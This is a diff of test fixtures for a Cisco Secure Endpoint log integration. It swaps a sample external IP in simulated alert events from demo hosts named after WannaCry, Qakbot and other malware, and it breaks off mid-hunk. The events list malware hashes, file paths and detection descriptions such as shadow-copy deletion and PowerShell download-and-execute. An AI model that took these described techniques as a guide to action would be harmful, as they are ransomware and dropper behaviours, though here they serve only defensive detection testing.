+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity 
Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
\ No newline at end of file
diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json
index 67f760bb316..b22bbab8b1f 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json
@@ -18,7 +18,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -28,8 +28,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965480188Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388856300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -49,7 +49,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -99,7 +99,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
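Review bot: The `event.ingested` values rewritten in this hunk (and again in the -116, -202 and -292 hunks) are wall-clock ingest timestamps that change on every regeneration and are unrelated to the IP substitution, so they add churn that hides the intended change. They can only pass comparison if `event.ingested` is declared under `dynamic_fields` in the data stream's pipeline test config, which is outside this diff and worth confirming. A narrower fix is to apply the substitution to the expected file directly, so that only the `"8.8.8.8"` → `"81.2.69.144"` lines and the matching `external_ip` inside `original` move. Separately, the embedded `original` still carries `\"id\":6419204901661835000` next to the full-precision string `\"detection_id\":\"6419204897366867970\"`, which looks like the sample was rounded to double precision when captured; if the pipeline maps `data.id` to a numeric field, real ids above 2^53 will be truncated at ingest, so a keyword mapping for that field is worth checking.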
@@ -116,8 +116,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965485160Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388859800Z", + "original": 
